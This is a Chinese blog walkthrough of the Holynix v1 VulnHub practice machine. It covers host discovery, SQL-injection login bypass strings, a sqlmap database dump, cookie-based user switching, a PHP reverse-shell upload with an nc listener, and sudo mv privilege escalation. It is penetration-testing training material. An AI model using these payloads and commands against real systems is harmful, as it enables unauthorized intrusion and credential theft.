Holynix: v1 靶机-详细流程

  • 准备工作


  1. 靶机下载链接:https://download.vulnhub.com/holynix/holynix-v1.tar.bz2
  2. 下载后解压,点击文件 .vmx

  3. 安装开启虚拟机,点击 "我已移动该虚拟机"

  4. 若点击"我已复制该虚拟机",则后续无法扫到 IP  (重要!)
  5. 成功启动

  6. 修改网卡(与自己的主机在同一网段下即可,有插网线推荐桥接,WIFI推荐NAT),这里我选择NAT

  7. 确认MAC地址
  8. 这里有个坑点:在它的配置文件中MAC地址是写死的,也就是说不是特定的MAC地址就扫不到IP.......
  9. MAC地址:00:0C:29:BC:05:DE
  10. 重启靶机

  • 信息收集


  1. 确定NAT网段
  2. 可以看到NAT是192.168.142.0/24网段的

  3. kali 执行  sudo nmap -sn -PR 192.168.142.0/24  

  4. 发现 IP 为 192.168.142.143
  5. 端口扫描:nmap -p- 192.168.142.143

  6. 发现开放80端口,尝试访问

  • 获取shell


  1. 点击login 进入登录界面

  2. 账号输入:admin"      密码输入:admin'   

  3. 发现报SQL的错误,查看其报错语句,发现注入点在密码上,其未对密码的单引号(')进行转义

  4. 尝试万能密码登录 密码:' or 1=1 #

  5. 登录成功

  6. 发现文件上传功能点

  7. 上传,发现提示 alamo 家目录禁止上传文件 ,表名了二个信息:一是当前用户无权限,二是会上传到家目录

  8. 找可疑功能点,最终发现以POST方式提交的参数

  9. 该页面Burp抓包修改(前)

  10. 修改后,发现可以进行文件读取

  11. 点击logout,使用etenenbaum用户进行登录

  12. 登录方式(三)
  13. 方式一:SQL注入
    • 密码处输入  ' or username='etenenbaum' # ,账户任意

    • 最终传入数据库的语句:SELECT * FROM accounts WHERE username='111' AND password='' or username='etenenbaum' #'

    • 登录成功:

    方式二:修改用户Cookie值实现越权
    • 点击F12 - 应用程序 - Cookie - URL链接

    • 发现1为alamo,0为未登录,2为etenenbaum用户,3为gmckinnon,.....(还满奇怪的)
    方式三:SqlMap下载数据
    • 这里要用本机的sqlmap,kali的不行
    • 语句:python sqlmap.py -u "http://192.168.142.143/index.php?page=login.php" --data="user_name=admin&password=admin" -p password --dbs --dump --batch
    • 将对方数据库下载下来看看,结果保存在这里

    • 发现最有价值的是 accounts.csv 文件

    • 尝试登录:账号:etenenbaum    密码:P3n7@g0n0wN3d   登录成功

    • 其实这时候就可以直接用获取的账号密码登录靶机了
  14. 返回上传功能点,上传文件

  15. 发现可以上传成功

  16. 访问家目录

  17. 点击上传文件,发现无法解析

  18. 回到kali构造反向shell,直接在kali中搜索并复制到当前目录

  19. 顺序执行以下命令

  20. locate php-reverse
    cp /usr/share/laudanum/php/php-reverse-shell.php .
    vim php-reverse-shell.php
  21. 修改其中反弹shell的ip和端口(要为可以反弹到的IP和端口)

  22. 当前目录下找到前面拷贝的文件,进行压缩:

  23. tar czf shell.tar.gz php-reverse-shell.php

  24. 得到

  25. 开启监听 nc -lvnp 555

  26. 将得到的压缩文件 shell.tar.gz 通过上传功能点上传到靶机,记得勾选下面的选项

  27. 上传后,点击它自动解压后的 php-reverse-shell.php  文件,发现反弹shell成功

  28. 这里有个坑点,本机概率反弹不到,可以重启靶机,重启靶机不行的,直接在kali上使用火狐浏览器上传和反弹,如果还是反弹不到,请检查你写的IP和端口

  • 权限提升 - SUDO提权


  1. 列出当前用户拥有sudo权限的命令    sudo -l

  2. 使用mv提权

    1. 先将tar 改名为 tar.orgi:  sudo mv /bin/tar /bin/tar.orgi
    2. 将提权的su命令改为tar命令:      sudo mv /bin/su  /bin/tar
    3. 执行 修改后的tar 命令(实际是执行su命令):   sudo tar
    4. 提权成功

  • 总结


  1. 流程:主机发现 - 信息收集 - web渗透 -  获取shell - 权限提升

  2. web渗透:

    1. 在web渗透中看到参数=文件?文件 时,就要想到任意文件读取等文件相关的漏洞;

    2. SQLMap注入时 ,我经常使用的是 -r 和 -p 参数,没想到在这次的注入中居然失灵了,一度以为无法使用SQLMap,没想到 --data 反而立了大功,这倒是提醒我要经常换着使用参数;

    3. Cookie的修改越权,近期见的确实不少,以后要将查看Cookie的优先度,往前提一提了;

    4. 还有一些需要在本机和kali间来回切换执行的命令,在以后的渗透中,也要多多测试了;

    5. 在靶机里Security 功能下的 Display File 中并没有想到其居然隐藏着一个POST参数,以后看到能点的就需要多多尝试了

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值